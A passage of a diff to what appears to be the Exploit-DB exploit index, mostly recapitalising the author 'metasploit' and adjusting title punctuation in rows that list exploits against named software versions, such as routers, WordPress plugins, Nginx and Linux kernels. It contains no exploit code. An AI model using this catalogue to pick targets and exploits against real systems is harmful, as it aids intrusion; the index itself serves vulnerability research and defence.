Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilites",2013-03-27,Esac,php,webapps,0 @@ -22049,13 +22049,13 @@ id,file,description,date,author,platform,type,port 24898,platforms/php/webapps/24898.txt,"SynConnect Pms (index.php loginid param) - SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 -24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,metasploit,linux,remote,5666 +24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 -24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,metasploit,php,remote,0 -24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell Remote Code Execution",2013-03-29,metasploit,php,remote,0 -24904,platforms/windows/remote/24904.rb,"Java CMM Remote Code Execution",2013-03-29,metasploit,windows,remote,0 -24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,metasploit,multiple,remote,0 +24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,Metasploit,php,remote,0 +24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell Remote Code Execution",2013-03-29,Metasploit,php,remote,0 +24904,platforms/windows/remote/24904.rb,"Java CMM Remote Code Execution",2013-03-29,Metasploit,windows,remote,0 +24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,Metasploit,multiple,remote,0 24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what param) Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 DoS",2013-04-05,npn,windows,dos,0 @@ -22072,16 +22072,16 @@ id,file,description,date,author,platform,type,port 24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL-Injection",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF",2013-04-08,Un0wn_X,hardware,webapps,0 -24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation",2013-04-08,metasploit,linux,local,0 +24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation",2013-04-08,Metasploit,linux,local,0 24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - (.mp3) Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",windows,dos,0 -24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,metasploit,hardware,remote,0 +24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,Metasploit,hardware,remote,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 (grouppay.php hash param) - SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 -24935,platforms/linux/remote/24935.rb,"MongoDB nativeHelper.apply Remote Code Execution",2013-04-08,metasploit,linux,remote,0 -24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 apply.cgi Remote Command Injection",2013-04-08,metasploit,hardware,remote,0 -24937,platforms/linux/remote/24937.rb,"HP System Management Anonymous Access Code Execution",2013-04-08,metasploit,linux,remote,0 -24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)",2013-04-08,metasploit,multiple,remote,0 +24935,platforms/linux/remote/24935.rb,"MongoDB nativeHelper.apply Remote Code Execution",2013-04-08,Metasploit,linux,remote,0 +24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 apply.cgi Remote Command Injection",2013-04-08,Metasploit,hardware,remote,0 +24937,platforms/linux/remote/24937.rb,"HP System Management Anonymous Access Code Execution",2013-04-08,Metasploit,linux,remote,0 +24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)",2013-04-08,Metasploit,multiple,remote,0 27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",windows,dos,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 @@ -22091,8 +22091,8 @@ id,file,description,date,author,platform,type,port 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 -24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0 -24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0 +24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,Metasploit,hardware,remote,0 +24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,Metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 27434,platforms/php/webapps/27434.txt,"Oxynews Index.php SQL Injection",2006-03-16,R00T3RR0R,php,webapps,0 27435,platforms/php/webapps/27435.txt,"phpMyAdmin 2.8.1 - Set_Theme Cross-Site Scripting",2006-03-16,"Ali Asad",php,webapps,0 @@ -22101,7 +22101,7 @@ id,file,description,date,author,platform,type,port 24952,platforms/windows/dos/24952.py,"AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS",2013-04-12,xis_one,windows,dos,69 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 24954,platforms/php/webapps/24954.txt,"Simple HRM System <= 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 -24956,platforms/hardware/remote/24956.rb,"DLink DIR-645 / DIR-815 diagnostic.php Command Execution",2013-04-12,metasploit,hardware,remote,0 +24956,platforms/hardware/remote/24956.rb,"DLink DIR-645 - / DIR-815 diagnostic.php Command Execution",2013-04-12,Metasploit,hardware,remote,0 24958,platforms/windows/remote/24958.py,"MinaliC Webserver 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 24960,platforms/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection",2013-04-15,NoGe,php,webapps,0 @@ -22119,9 +22119,9 @@ id,file,description,date,author,platform,type,port 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.php Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow <= 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 -24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,metasploit,hardware,remote,0 +24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 -24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,metasploit,multiple,remote,0 +24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,Metasploit,multiple,remote,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.php Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 @@ -22155,8 +22155,8 @@ id,file,description,date,author,platform,type,port 29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.php Remote File Include",2006-12-13,the_Edit0r,php,webapps,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 -25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free",2013-05-07,metasploit,windows,remote,0 -25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,metasploit,linux,remote,0 +25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free",2013-05-07,Metasploit,windows,remote,0 +25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 25004,platforms/linux/dos/25004.txt,"QwikMail 0.3 HELO Command Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,dos,0 @@ -22220,8 +22220,8 @@ id,file,description,date,author,platform,type,port 25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant IN_CDDA.dll Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0 25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 INDEX.php Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0 -25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 -25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) upload.php Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 +25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 - (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 +25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 - (Build 1112) upload.php Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0 25067,platforms/cgi/webapps/25067.txt,"alt-n webadmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 login.html username Parameter XSS",2005-01-28,ShineShadow,php,webapps,0 @@ -22289,8 +22289,8 @@ id,file,description,date,author,platform,type,port 25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 -25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,metasploit,php,remote,0 -25137,platforms/php/remote/25137.rb,"WordPress W3 Total Cache - PHP Code Execution",2013-05-01,metasploit,php,remote,0 +25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0 +25137,platforms/php/remote/25137.rb,"WordPress W3 Total Cache - PHP Code Execution",2013-05-01,Metasploit,php,remote,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25140,platforms/windows/dos/25140.txt,"WPS Office Wpsio.dll - Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 @@ -22432,9 +22432,9 @@ id,file,description,date,author,platform,type,port 25289,platforms/linux/local/25289.c,"Linux Kernel <= 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 -25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80 +25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,Metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 -25296,platforms/windows/local/25296.rb,"AudioCoder .M3U Buffer Overflow",2013-05-07,metasploit,windows,local,0 +25296,platforms/windows/local/25296.rb,"AudioCoder .M3U Buffer Overflow",2013-05-07,Metasploit,windows,local,0 25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox Query Parameter URI Redirection",2005-03-28,CorryL,php,webapps,0 @@ -22583,10 +22583,10 @@ id,file,description,date,author,platform,type,port 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow (SEH)",2013-05-14,ariarat,windows,dos,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1)",2013-05-14,sd,linux,local,0 -25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 -25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 +25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 +25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0 -25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,metasploit,windows,local,0 +25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,Metasploit,windows,local,0 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 @@ -22650,7 +22650,7 @@ id,file,description,date,author,platform,type,port 25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 Access.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 Error.ASP Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 Login.ASP Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25517,platforms/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload",2013-05-17,metasploit,linux,remote,0 +25517,platforms/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload",2013-05-17,Metasploit,linux,remote,0 25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 25519,platforms/php/webapps/25519.txt,"ZPanel templateparser.class.php - Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 Login.ASP Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 @@ -22739,8 +22739,8 @@ id,file,description,date,author,platform,type,port 25605,platforms/php/webapps/25605.txt,"WordPress ProPlayer Plugin 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps,0 25606,platforms/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection",2013-05-21,drone,php,webapps,0 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Local Code Execution BOF",2013-05-21,xis_one,windows,local,0 -25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,metasploit,hardware,remote,80 -25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h OS Command Injection",2013-05-21,metasploit,hardware,remote,80 +25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,Metasploit,hardware,remote,80 +25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h OS Command Injection",2013-05-21,Metasploit,hardware,remote,80 25611,platforms/windows/dos/25611.txt,"Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 @@ -22860,7 +22860,7 @@ id,file,description,date,author,platform,type,port 25721,platforms/php/webapps/25721.txt,"WordPress User Role Editor Plugin 3.12 - CSRF",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"WordPress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"WordPress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25725,platforms/windows/local/25725.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,metasploit,windows,local,0 +25725,platforms/windows/local/25725.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,Metasploit,windows,local,0 25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 (menager.php playlist_id param) - SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 add_review.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 add_contents.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 @@ -22877,15 +22877,15 @@ id,file,description,date,author,platform,type,port 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x Unauthorized Access",2005-05-28,V[i]RuS,php,webapps,0 -25742,platforms/php/webapps/25742.txt,"NPDS 4.8 /5.0 admin.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 -25743,platforms/php/webapps/25743.txt,"NPDS 4.8 /5.0 powerpack_f.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 -25744,platforms/php/webapps/25744.txt,"NPDS 4.8 /5.0 sdv_infos.php sitename Parameter XSS",2005-05-28,NoSP,php,webapps,0 -25745,platforms/php/webapps/25745.txt,"NPDS 4.8 /5.0 Modules.php Lettre Parameter XSS",2005-05-28,NoSP,php,webapps,0 -25746,platforms/php/webapps/25746.txt,"NPDS 4.8 /5.0 reviews.php title Parameter XSS",2005-05-28,NoSP,php,webapps,0 -25747,platforms/php/webapps/25747.txt,"NPDS 4.8 /5.0 reply.php image_subject Parameter XSS",2005-05-28,NoSP,php,webapps,0 -25748,platforms/php/webapps/25748.txt,"NPDS 4.8 /5.0 Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 -25749,platforms/php/webapps/25749.txt,"NPDS 4.8 /5.0 links.php Query Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 -25750,platforms/php/webapps/25750.txt,"NPDS 4.8 /5.0 faq.php categories Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25742,platforms/php/webapps/25742.txt,"NPDS 4.8 - /5.0 admin.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25743,platforms/php/webapps/25743.txt,"NPDS 4.8 - /5.0 powerpack_f.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25744,platforms/php/webapps/25744.txt,"NPDS 4.8 - /5.0 sdv_infos.php sitename Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25745,platforms/php/webapps/25745.txt,"NPDS 4.8 - /5.0 Modules.php Lettre Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25746,platforms/php/webapps/25746.txt,"NPDS 4.8 - /5.0 reviews.php title Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25747,platforms/php/webapps/25747.txt,"NPDS 4.8 - /5.0 reply.php image_subject Parameter XSS",2005-05-28,NoSP,php,webapps,0 +25748,platforms/php/webapps/25748.txt,"NPDS 4.8 - /5.0 Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 +25749,platforms/php/webapps/25749.txt,"NPDS 4.8 - /5.0 links.php Query Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 +25750,platforms/php/webapps/25750.txt,"NPDS 4.8 - /5.0 faq.php categories Parameter XSS",2005-05-28,NoSP,php,webapps,0 25751,platforms/asp/webapps/25751.txt,"OS4E LOGIN.ASP SQL Injection",2005-05-28,"Dj romty",asp,webapps,0 25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 Data() Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 @@ -22958,11 +22958,11 @@ id,file,description,date,author,platform,type,port 25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (Mac OS X) - Crash PoC",2013-05-29,ariarat,osx,dos,0 -25810,platforms/hardware/webapps/25810.py,"TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 +25810,platforms/hardware/webapps/25810.py,"TP-LINK WR842ND - Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware <= 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 -25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,metasploit,windows,remote,0 +25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,Metasploit,windows,remote,0 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 browse.php show_course Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 contact.php subject Parameter XSS",2005-06-16,Lostmon,php,webapps,0 @@ -22992,7 +22992,7 @@ id,file,description,date,author,platform,type,port 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.CGI Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 AddItem.ASP SQL Injection",2005-08-21,SmOk3,asp,webapps,0 26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service",2005-08-22,"Mella Marco",osx,dos,0 -25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow",2013-05-31,metasploit,windows,remote,8001 +25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow",2013-05-31,Metasploit,windows,remote,8001 25852,platforms/multiple/dos/25852.py,"ModSecurity Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25854,platforms/php/webapps/25854.txt,"PAFaq Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 @@ -23115,12 +23115,12 @@ id,file,description,date,author,platform,type,port 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 (tinybrowser.php folder param) - Path Traversal",2013-06-05,expl0i13r,php,webapps,0 25974,platforms/osx/dos/25974.txt,"Mac OS X Server DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 -25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow 